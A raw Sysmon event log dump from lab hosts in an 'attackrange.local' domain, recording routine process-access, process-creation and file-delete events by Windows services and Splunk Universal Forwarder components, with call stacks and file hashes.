08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809068Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809067Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809066Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809065Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809064Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F69B-60EB-B079-00000000D001}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809063Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F69B-60EB-B079-00000000D001}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809062Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.604{0C1E0330-F69B-60EB-B079-00000000D001}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809061Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.087{0C1E0330-F69A-60EB-AF79-00000000D001}14362356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.462{0C1E0330-F69C-60EB-B179-00000000D001}23081504C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F69C-60EB-B179-00000000D001}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F69C-60EB-B179-00000000D001}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.306{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F69C-60EB-B179-00000000D001}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.291{0C1E0330-F69C-60EB-B179-00000000D001}2308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:28.056{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84115B292F280DCD7B4FE7F41EAFAA20,SHA256=681B66CCFA99C2463AB4ED2144C9DFC45879EF193BAD6B43D36B233E8C0CD457,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:28.035{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E630C9332D4AEF9F53C352B320590BB,SHA256=FB4872EA8B1EEAD0704FF886B23703F66B5958F70E65CF4528FDC9A1B054230B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809092Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:29.306{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A15D38635EF4328B5ECEA20731DB1F96,SHA256=D77F511BE633FB6CE83C87A724746928A937D3491951A95D6525FF3871F138BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:29.290{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B20B62C9508C1A42BB77FE64AAF990FE,SHA256=B96AF6770B087B6E6BA93C474DD875C7B76594EC3871C0167764B8887479AD60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:29.036{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=231BAEA215D86A3A7109660F83C5923C,SHA256=A5F5E46AF183E1617359088512A892154E6F826C5CB839F026311FFE873D91D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809095Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:30.290{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA9E47D821245145A99D09689C50F53A,SHA256=7817F3F63F706F63EE9B264AFC7BC7BAC94EF4D90693057877E31EE957F7F20C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:30.967{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93CF72DAEF49F1A44EFC0DF9D3456C94,SHA256=6FC18F2166A6AF940D3508507DCF10FAD4508C873842725A66F341B229C46155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:30.967{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 